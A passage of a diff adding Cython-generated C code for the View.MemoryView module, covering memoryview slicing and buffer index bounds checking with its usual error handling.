__pyx_v_memview->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 784, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + + /* "View.MemoryView":784 + * memview.dtype_is_object) + * else: + * return memoryview_fromslice(dst, new_ndim, NULL, NULL, # <<<<<<<<<<<<<< + * memview.dtype_is_object) + * + */ + if (!(likely(((__pyx_t_2) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_2, __pyx_memoryview_type))))) __PYX_ERR(1, 784, __pyx_L1_error) + __pyx_r = ((struct __pyx_memoryview_obj *)__pyx_t_2); + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":711 + * + * @cname('__pyx_memview_slice') + * cdef memoryview memview_slice(memoryview memview, object indices): # <<<<<<<<<<<<<< + * cdef int new_ndim = 0, suboffset_dim = -1, dim + * cdef bint negative_step + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("View.MemoryView.memview_slice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_memviewsliceobj); + __Pyx_XDECREF(__pyx_v_index); + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":793 + * + * @cname('__pyx_memoryview_slice_memviewslice') + * cdef int slice_memviewslice( # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * Py_ssize_t shape, Py_ssize_t stride, Py_ssize_t suboffset, + */ + +static int __pyx_memoryview_slice_memviewslice(__Pyx_memviewslice *__pyx_v_dst, Py_ssize_t __pyx_v_shape, Py_ssize_t __pyx_v_stride, Py_ssize_t __pyx_v_suboffset, int __pyx_v_dim, int __pyx_v_new_ndim, int *__pyx_v_suboffset_dim, Py_ssize_t __pyx_v_start, Py_ssize_t __pyx_v_stop, Py_ssize_t __pyx_v_step, int __pyx_v_have_start, int __pyx_v_have_stop, int __pyx_v_have_step, int __pyx_v_is_slice) { + Py_ssize_t __pyx_v_new_shape; + int __pyx_v_negative_step; + int __pyx_r; + int __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":813 + * cdef bint negative_step + * + * if not is_slice: # <<<<<<<<<<<<<< + * + * if start < 0: + */ + __pyx_t_1 = (!__pyx_v_is_slice); + if (__pyx_t_1) { + + /* "View.MemoryView":815 + * if not is_slice: + * + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if not 0 <= start < shape: + */ + __pyx_t_1 = (__pyx_v_start < 0); + if (__pyx_t_1) { + + /* "View.MemoryView":816 + * + * if start < 0: + * start += shape # <<<<<<<<<<<<<< + * if not 0 <= start < shape: + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + */ + __pyx_v_start = (__pyx_v_start + __pyx_v_shape); + + /* "View.MemoryView":815 + * if not is_slice: + * + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if not 0 <= start < shape: + */ + } + + /* "View.MemoryView":817 + * if start < 0: + * start += shape + * if not 0 <= start < shape: # <<<<<<<<<<<<<< + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + * else: + */ + __pyx_t_1 = (0 <= __pyx_v_start); + if (__pyx_t_1) { + __pyx_t_1 = (__pyx_v_start < __pyx_v_shape); + } + __pyx_t_2 = (!__pyx_t_1); + if (__pyx_t_2) { + + /* "View.MemoryView":818 + * start += shape + * if not 0 <= start < shape: + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) # <<<<<<<<<<<<<< + * else: + * + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_IndexError, __pyx_kp_s_Index_out_of_bounds_axis_d, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 818, __pyx_L1_error) + + /* "View.MemoryView":817 + * if start < 0: + * start += shape + * if not 0 <= start < shape: # <<<<<<<<<<<<<< + * _err_dim(PyExc_IndexError, "Index out of bounds (axis %d)", dim) + * else: + */ + } + + /* "View.MemoryView":813 + * cdef bint negative_step + * + * if not is_slice: # <<<<<<<<<<<<<< + * + * if start < 0: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":821 + * else: + * + * if have_step: # <<<<<<<<<<<<<< + * negative_step = step < 0 + * if step == 0: + */ + /*else*/ { + __pyx_t_2 = (__pyx_v_have_step != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":822 + * + * if have_step: + * negative_step = step < 0 # <<<<<<<<<<<<<< + * if step == 0: + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + */ + __pyx_v_negative_step = (__pyx_v_step < 0); + + /* "View.MemoryView":823 + * if have_step: + * negative_step = step < 0 + * if step == 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + */ + __pyx_t_2 = (__pyx_v_step == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":824 + * negative_step = step < 0 + * if step == 0: + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) # <<<<<<<<<<<<<< + * else: + * negative_step = False + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_ValueError, __pyx_kp_s_Step_may_not_be_zero_axis_d, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 824, __pyx_L1_error) + + /* "View.MemoryView":823 + * if have_step: + * negative_step = step < 0 + * if step == 0: # <<<<<<<<<<<<<< + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + */ + } + + /* "View.MemoryView":821 + * else: + * + * if have_step: # <<<<<<<<<<<<<< + * negative_step = step < 0 + * if step == 0: + */ + goto __pyx_L6; + } + + /* "View.MemoryView":826 + * _err_dim(PyExc_ValueError, "Step may not be zero (axis %d)", dim) + * else: + * negative_step = False # <<<<<<<<<<<<<< + * step = 1 + * + */ + /*else*/ { + __pyx_v_negative_step = 0; + + /* "View.MemoryView":827 + * else: + * negative_step = False + * step = 1 # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_step = 1; + } + __pyx_L6:; + + /* "View.MemoryView":830 + * + * + * if have_start: # <<<<<<<<<<<<<< + * if start < 0: + * start += shape + */ + __pyx_t_2 = (__pyx_v_have_start != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":831 + * + * if have_start: + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if start < 0: + */ + __pyx_t_2 = (__pyx_v_start < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":832 + * if have_start: + * if start < 0: + * start += shape # <<<<<<<<<<<<<< + * if start < 0: + * start = 0 + */ + __pyx_v_start = (__pyx_v_start + __pyx_v_shape); + + /* "View.MemoryView":833 + * if start < 0: + * start += shape + * if start < 0: # <<<<<<<<<<<<<< + * start = 0 + * elif start >= shape: + */ + __pyx_t_2 = (__pyx_v_start < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":834 + * start += shape + * if start < 0: + * start = 0 # <<<<<<<<<<<<<< + * elif start >= shape: + * if negative_step: + */ + __pyx_v_start = 0; + + /* "View.MemoryView":833 + * if start < 0: + * start += shape + * if start < 0: # <<<<<<<<<<<<<< + * start = 0 + * elif start >= shape: + */ + } + + /* "View.MemoryView":831 + * + * if have_start: + * if start < 0: # <<<<<<<<<<<<<< + * start += shape + * if start < 0: + */ + goto __pyx_L9; + } + + /* "View.MemoryView":835 + * if start < 0: + * start = 0 + * elif start >= shape: # <<<<<<<<<<<<<< + * if negative_step: + * start = shape - 1 + */ + __pyx_t_2 = (__pyx_v_start >= __pyx_v_shape); + if (__pyx_t_2) { + + /* "View.MemoryView":836 + * start = 0 + * elif start >= shape: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + if (__pyx_v_negative_step) { + + /* "View.MemoryView":837 + * elif start >= shape: + * if negative_step: + * start = shape - 1 # <<<<<<<<<<<<<< + * else: + * start = shape + */ + __pyx_v_start = (__pyx_v_shape - 1); + + /* "View.MemoryView":836 + * start = 0 + * elif start >= shape: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + goto __pyx_L11; + } + + /* "View.MemoryView":839 + * start = shape - 1 + * else: + * start = shape # <<<<<<<<<<<<<< + * else: + * if negative_step: + */ + /*else*/ { + __pyx_v_start = __pyx_v_shape; + } + __pyx_L11:; + + /* "View.MemoryView":835 + * if start < 0: + * start = 0 + * elif start >= shape: # <<<<<<<<<<<<<< + * if negative_step: + * start = shape - 1 + */ + } + __pyx_L9:; + + /* "View.MemoryView":830 + * + * + * if have_start: # <<<<<<<<<<<<<< + * if start < 0: + * start += shape + */ + goto __pyx_L8; + } + + /* "View.MemoryView":841 + * start = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + /*else*/ { + if (__pyx_v_negative_step) { + + /* "View.MemoryView":842 + * else: + * if negative_step: + * start = shape - 1 # <<<<<<<<<<<<<< + * else: + * start = 0 + */ + __pyx_v_start = (__pyx_v_shape - 1); + + /* "View.MemoryView":841 + * start = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * start = shape - 1 + * else: + */ + goto __pyx_L12; + } + + /* "View.MemoryView":844 + * start = shape - 1 + * else: + * start = 0 # <<<<<<<<<<<<<< + * + * if have_stop: + */ + /*else*/ { + __pyx_v_start = 0; + } + __pyx_L12:; + } + __pyx_L8:; + + /* "View.MemoryView":846 + * start = 0 + * + * if have_stop: # <<<<<<<<<<<<<< + * if stop < 0: + * stop += shape + */ + __pyx_t_2 = (__pyx_v_have_stop != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":847 + * + * if have_stop: + * if stop < 0: # <<<<<<<<<<<<<< + * stop += shape + * if stop < 0: + */ + __pyx_t_2 = (__pyx_v_stop < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":848 + * if have_stop: + * if stop < 0: + * stop += shape # <<<<<<<<<<<<<< + * if stop < 0: + * stop = 0 + */ + __pyx_v_stop = (__pyx_v_stop + __pyx_v_shape); + + /* "View.MemoryView":849 + * if stop < 0: + * stop += shape + * if stop < 0: # <<<<<<<<<<<<<< + * stop = 0 + * elif stop > shape: + */ + __pyx_t_2 = (__pyx_v_stop < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":850 + * stop += shape + * if stop < 0: + * stop = 0 # <<<<<<<<<<<<<< + * elif stop > shape: + * stop = shape + */ + __pyx_v_stop = 0; + + /* "View.MemoryView":849 + * if stop < 0: + * stop += shape + * if stop < 0: # <<<<<<<<<<<<<< + * stop = 0 + * elif stop > shape: + */ + } + + /* "View.MemoryView":847 + * + * if have_stop: + * if stop < 0: # <<<<<<<<<<<<<< + * stop += shape + * if stop < 0: + */ + goto __pyx_L14; + } + + /* "View.MemoryView":851 + * if stop < 0: + * stop = 0 + * elif stop > shape: # <<<<<<<<<<<<<< + * stop = shape + * else: + */ + __pyx_t_2 = (__pyx_v_stop > __pyx_v_shape); + if (__pyx_t_2) { + + /* "View.MemoryView":852 + * stop = 0 + * elif stop > shape: + * stop = shape # <<<<<<<<<<<<<< + * else: + * if negative_step: + */ + __pyx_v_stop = __pyx_v_shape; + + /* "View.MemoryView":851 + * if stop < 0: + * stop = 0 + * elif stop > shape: # <<<<<<<<<<<<<< + * stop = shape + * else: + */ + } + __pyx_L14:; + + /* "View.MemoryView":846 + * start = 0 + * + * if have_stop: # <<<<<<<<<<<<<< + * if stop < 0: + * stop += shape + */ + goto __pyx_L13; + } + + /* "View.MemoryView":854 + * stop = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * stop = -1 + * else: + */ + /*else*/ { + if (__pyx_v_negative_step) { + + /* "View.MemoryView":855 + * else: + * if negative_step: + * stop = -1 # <<<<<<<<<<<<<< + * else: + * stop = shape + */ + __pyx_v_stop = -1L; + + /* "View.MemoryView":854 + * stop = shape + * else: + * if negative_step: # <<<<<<<<<<<<<< + * stop = -1 + * else: + */ + goto __pyx_L16; + } + + /* "View.MemoryView":857 + * stop = -1 + * else: + * stop = shape # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __pyx_v_stop = __pyx_v_shape; + } + __pyx_L16:; + } + __pyx_L13:; + + /* "View.MemoryView":861 + * + * with cython.cdivision(True): + * new_shape = (stop - start) // step # <<<<<<<<<<<<<< + * + * if (stop - start) - step * new_shape: + */ + __pyx_v_new_shape = ((__pyx_v_stop - __pyx_v_start) / __pyx_v_step); + + /* "View.MemoryView":863 + * new_shape = (stop - start) // step + * + * if (stop - start) - step * new_shape: # <<<<<<<<<<<<<< + * new_shape += 1 + * + */ + __pyx_t_2 = (((__pyx_v_stop - __pyx_v_start) - (__pyx_v_step * __pyx_v_new_shape)) != 0); + if (__pyx_t_2) { + + /* "View.MemoryView":864 + * + * if (stop - start) - step * new_shape: + * new_shape += 1 # <<<<<<<<<<<<<< + * + * if new_shape < 0: + */ + __pyx_v_new_shape = (__pyx_v_new_shape + 1); + + /* "View.MemoryView":863 + * new_shape = (stop - start) // step + * + * if (stop - start) - step * new_shape: # <<<<<<<<<<<<<< + * new_shape += 1 + * + */ + } + + /* "View.MemoryView":866 + * new_shape += 1 + * + * if new_shape < 0: # <<<<<<<<<<<<<< + * new_shape = 0 + * + */ + __pyx_t_2 = (__pyx_v_new_shape < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":867 + * + * if new_shape < 0: + * new_shape = 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_new_shape = 0; + + /* "View.MemoryView":866 + * new_shape += 1 + * + * if new_shape < 0: # <<<<<<<<<<<<<< + * new_shape = 0 + * + */ + } + + /* "View.MemoryView":870 + * + * + * dst.strides[new_ndim] = stride * step # <<<<<<<<<<<<<< + * dst.shape[new_ndim] = new_shape + * dst.suboffsets[new_ndim] = suboffset + */ + (__pyx_v_dst->strides[__pyx_v_new_ndim]) = (__pyx_v_stride * __pyx_v_step); + + /* "View.MemoryView":871 + * + * dst.strides[new_ndim] = stride * step + * dst.shape[new_ndim] = new_shape # <<<<<<<<<<<<<< + * dst.suboffsets[new_ndim] = suboffset + * + */ + (__pyx_v_dst->shape[__pyx_v_new_ndim]) = __pyx_v_new_shape; + + /* "View.MemoryView":872 + * dst.strides[new_ndim] = stride * step + * dst.shape[new_ndim] = new_shape + * dst.suboffsets[new_ndim] = suboffset # <<<<<<<<<<<<<< + * + * + */ + (__pyx_v_dst->suboffsets[__pyx_v_new_ndim]) = __pyx_v_suboffset; + } + __pyx_L3:; + + /* "View.MemoryView":875 + * + * + * if suboffset_dim[0] < 0: # <<<<<<<<<<<<<< + * dst.data += start * stride + * else: + */ + __pyx_t_2 = ((__pyx_v_suboffset_dim[0]) < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":876 + * + * if suboffset_dim[0] < 0: + * dst.data += start * stride # <<<<<<<<<<<<<< + * else: + * dst.suboffsets[suboffset_dim[0]] += start * stride + */ + __pyx_v_dst->data = (__pyx_v_dst->data + (__pyx_v_start * __pyx_v_stride)); + + /* "View.MemoryView":875 + * + * + * if suboffset_dim[0] < 0: # <<<<<<<<<<<<<< + * dst.data += start * stride + * else: + */ + goto __pyx_L19; + } + + /* "View.MemoryView":878 + * dst.data += start * stride + * else: + * dst.suboffsets[suboffset_dim[0]] += start * stride # <<<<<<<<<<<<<< + * + * if suboffset >= 0: + */ + /*else*/ { + __pyx_t_3 = (__pyx_v_suboffset_dim[0]); + (__pyx_v_dst->suboffsets[__pyx_t_3]) = ((__pyx_v_dst->suboffsets[__pyx_t_3]) + (__pyx_v_start * __pyx_v_stride)); + } + __pyx_L19:; + + /* "View.MemoryView":880 + * dst.suboffsets[suboffset_dim[0]] += start * stride + * + * if suboffset >= 0: # <<<<<<<<<<<<<< + * if not is_slice: + * if new_ndim == 0: + */ + __pyx_t_2 = (__pyx_v_suboffset >= 0); + if (__pyx_t_2) { + + /* "View.MemoryView":881 + * + * if suboffset >= 0: + * if not is_slice: # <<<<<<<<<<<<<< + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset + */ + __pyx_t_2 = (!__pyx_v_is_slice); + if (__pyx_t_2) { + + /* "View.MemoryView":882 + * if suboffset >= 0: + * if not is_slice: + * if new_ndim == 0: # <<<<<<<<<<<<<< + * dst.data = ( dst.data)[0] + suboffset + * else: + */ + __pyx_t_2 = (__pyx_v_new_ndim == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":883 + * if not is_slice: + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset # <<<<<<<<<<<<<< + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " + */ + __pyx_v_dst->data = ((((char **)__pyx_v_dst->data)[0]) + __pyx_v_suboffset); + + /* "View.MemoryView":882 + * if suboffset >= 0: + * if not is_slice: + * if new_ndim == 0: # <<<<<<<<<<<<<< + * dst.data = ( dst.data)[0] + suboffset + * else: + */ + goto __pyx_L22; + } + + /* "View.MemoryView":885 + * dst.data = ( dst.data)[0] + suboffset + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " # <<<<<<<<<<<<<< + * "must be indexed and not sliced", dim) + * else: + */ + /*else*/ { + + /* "View.MemoryView":886 + * else: + * _err_dim(PyExc_IndexError, "All dimensions preceding dimension %d " + * "must be indexed and not sliced", dim) # <<<<<<<<<<<<<< + * else: + * suboffset_dim[0] = new_ndim + */ + __pyx_t_3 = __pyx_memoryview_err_dim(PyExc_IndexError, __pyx_kp_s_All_dimensions_preceding_dimensi, __pyx_v_dim); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 885, __pyx_L1_error) + } + __pyx_L22:; + + /* "View.MemoryView":881 + * + * if suboffset >= 0: + * if not is_slice: # <<<<<<<<<<<<<< + * if new_ndim == 0: + * dst.data = ( dst.data)[0] + suboffset + */ + goto __pyx_L21; + } + + /* "View.MemoryView":888 + * "must be indexed and not sliced", dim) + * else: + * suboffset_dim[0] = new_ndim # <<<<<<<<<<<<<< + * + * return 0 + */ + /*else*/ { + (__pyx_v_suboffset_dim[0]) = __pyx_v_new_ndim; + } + __pyx_L21:; + + /* "View.MemoryView":880 + * dst.suboffsets[suboffset_dim[0]] += start * stride + * + * if suboffset >= 0: # <<<<<<<<<<<<<< + * if not is_slice: + * if new_ndim == 0: + */ + } + + /* "View.MemoryView":890 + * suboffset_dim[0] = new_ndim + * + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":793 + * + * @cname('__pyx_memoryview_slice_memviewslice') + * cdef int slice_memviewslice( # <<<<<<<<<<<<<< + * __Pyx_memviewslice *dst, + * Py_ssize_t shape, Py_ssize_t stride, Py_ssize_t suboffset, + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.slice_memviewslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":896 + * + * @cname('__pyx_pybuffer_index') + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, # <<<<<<<<<<<<<< + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + */ + +static char *__pyx_pybuffer_index(Py_buffer *__pyx_v_view, char *__pyx_v_bufp, Py_ssize_t __pyx_v_index, Py_ssize_t __pyx_v_dim) { + Py_ssize_t __pyx_v_shape; + Py_ssize_t __pyx_v_stride; + Py_ssize_t __pyx_v_suboffset; + Py_ssize_t __pyx_v_itemsize; + char *__pyx_v_resultp; + char *__pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + Py_UCS4 __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("pybuffer_index", 0); + + /* "View.MemoryView":898 + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 # <<<<<<<<<<<<<< + * cdef Py_ssize_t itemsize = view.itemsize + * cdef char *resultp + */ + __pyx_v_suboffset = -1L; + + /* "View.MemoryView":899 + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + * cdef Py_ssize_t itemsize = view.itemsize # <<<<<<<<<<<<<< + * cdef char *resultp + * + */ + __pyx_t_1 = __pyx_v_view->itemsize; + __pyx_v_itemsize = __pyx_t_1; + + /* "View.MemoryView":902 + * cdef char *resultp + * + * if view.ndim == 0: # <<<<<<<<<<<<<< + * shape = view.len // itemsize + * stride = itemsize + */ + __pyx_t_2 = (__pyx_v_view->ndim == 0); + if (__pyx_t_2) { + + /* "View.MemoryView":903 + * + * if view.ndim == 0: + * shape = view.len // itemsize # <<<<<<<<<<<<<< + * stride = itemsize + * else: + */ + if (unlikely(__pyx_v_itemsize == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 903, __pyx_L1_error) + } + else if (sizeof(Py_ssize_t) == sizeof(long) && (!(((Py_ssize_t)-1) > 0)) && unlikely(__pyx_v_itemsize == (Py_ssize_t)-1) && unlikely(__Pyx_UNARY_NEG_WOULD_OVERFLOW(__pyx_v_view->len))) { + PyErr_SetString(PyExc_OverflowError, "value too large to perform division"); + __PYX_ERR(1, 903, __pyx_L1_error) + } + __pyx_v_shape = __Pyx_div_Py_ssize_t(__pyx_v_view->len, __pyx_v_itemsize); + + /* "View.MemoryView":904 + * if view.ndim == 0: + * shape = view.len // itemsize + * stride = itemsize # <<<<<<<<<<<<<< + * else: + * shape = view.shape[dim] + */ + __pyx_v_stride = __pyx_v_itemsize; + + /* "View.MemoryView":902 + * cdef char *resultp + * + * if view.ndim == 0: # <<<<<<<<<<<<<< + * shape = view.len // itemsize + * stride = itemsize + */ + goto __pyx_L3; + } + + /* "View.MemoryView":906 + * stride = itemsize + * else: + * shape = view.shape[dim] # <<<<<<<<<<<<<< + * stride = view.strides[dim] + * if view.suboffsets != NULL: + */ + /*else*/ { + __pyx_v_shape = (__pyx_v_view->shape[__pyx_v_dim]); + + /* "View.MemoryView":907 + * else: + * shape = view.shape[dim] + * stride = view.strides[dim] # <<<<<<<<<<<<<< + * if view.suboffsets != NULL: + * suboffset = view.suboffsets[dim] + */ + __pyx_v_stride = (__pyx_v_view->strides[__pyx_v_dim]); + + /* "View.MemoryView":908 + * shape = view.shape[dim] + * stride = view.strides[dim] + * if view.suboffsets != NULL: # <<<<<<<<<<<<<< + * suboffset = view.suboffsets[dim] + * + */ + __pyx_t_2 = (__pyx_v_view->suboffsets != NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":909 + * stride = view.strides[dim] + * if view.suboffsets != NULL: + * suboffset = view.suboffsets[dim] # <<<<<<<<<<<<<< + * + * if index < 0: + */ + __pyx_v_suboffset = (__pyx_v_view->suboffsets[__pyx_v_dim]); + + /* "View.MemoryView":908 + * shape = view.shape[dim] + * stride = view.strides[dim] + * if view.suboffsets != NULL: # <<<<<<<<<<<<<< + * suboffset = view.suboffsets[dim] + * + */ + } + } + __pyx_L3:; + + /* "View.MemoryView":911 + * suboffset = view.suboffsets[dim] + * + * if index < 0: # <<<<<<<<<<<<<< + * index += view.shape[dim] + * if index < 0: + */ + __pyx_t_2 = (__pyx_v_index < 0); + if (__pyx_t_2) { + + /* "View.MemoryView":912 + * + * if index < 0: + * index += view.shape[dim] # <<<<<<<<<<<<<< + * if index < 0: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + */ + __pyx_v_index = (__pyx_v_index + (__pyx_v_view->shape[__pyx_v_dim])); + + /* "View.MemoryView":913 + * if index < 0: + * index += view.shape[dim] + * if index < 0: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + __pyx_t_2 = (__pyx_v_index < 0); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":914 + * index += view.shape[dim] + * if index < 0: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" # <<<<<<<<<<<<<< + * + * if index >= shape: + */ + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = 0; + __pyx_t_4 = 127; + __Pyx_INCREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_1 += 37; + __Pyx_GIVEREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_5 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_5); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_5); + __pyx_t_5 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_1 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_kp_u__7); + __pyx_t_5 = __Pyx_PyUnicode_Join(__pyx_t_3, 3, __pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 914, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_builtin_IndexError, __pyx_t_5, 0, 0); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __PYX_ERR(1, 914, __pyx_L1_error) + + /* "View.MemoryView":913 + * if index < 0: + * index += view.shape[dim] + * if index < 0: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + } + + /* "View.MemoryView":911 + * suboffset = view.suboffsets[dim] + * + * if index < 0: # <<<<<<<<<<<<<< + * index += view.shape[dim] + * if index < 0: + */ + } + + /* "View.MemoryView":916 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * if index >= shape: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + __pyx_t_2 = (__pyx_v_index >= __pyx_v_shape); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":917 + * + * if index >= shape: + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" # <<<<<<<<<<<<<< + * + * resultp = bufp + index * stride + */ + __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = 0; + __pyx_t_4 = 127; + __Pyx_INCREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_1 += 37; + __Pyx_GIVEREF(__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_Out_of_bounds_on_buffer_access_a); + __pyx_t_3 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_3); + __pyx_t_3 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_1 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u__7); + __pyx_t_3 = __Pyx_PyUnicode_Join(__pyx_t_5, 3, __pyx_t_1, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 917, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_builtin_IndexError, __pyx_t_3, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(1, 917, __pyx_L1_error) + + /* "View.MemoryView":916 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * if index >= shape: # <<<<<<<<<<<<<< + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + */ + } + + /* "View.MemoryView":919 + * raise IndexError, f"Out of bounds on buffer access (axis {dim})" + * + * resultp = bufp + index * stride # <<<<<<<<<<<<<< + * if suboffset >= 0: + * resultp = ( resultp)[0] + suboffset + */ + __pyx_v_resultp = (__pyx_v_bufp + (__pyx_v_index * __pyx_v_stride)); + + /* "View.MemoryView":920 + * + * resultp = bufp + index * stride + * if suboffset >= 0: # <<<<<<<<<<<<<< + * resultp = ( resultp)[0] + suboffset + * + */ + __pyx_t_2 = (__pyx_v_suboffset >= 0); + if (__pyx_t_2) { + + /* 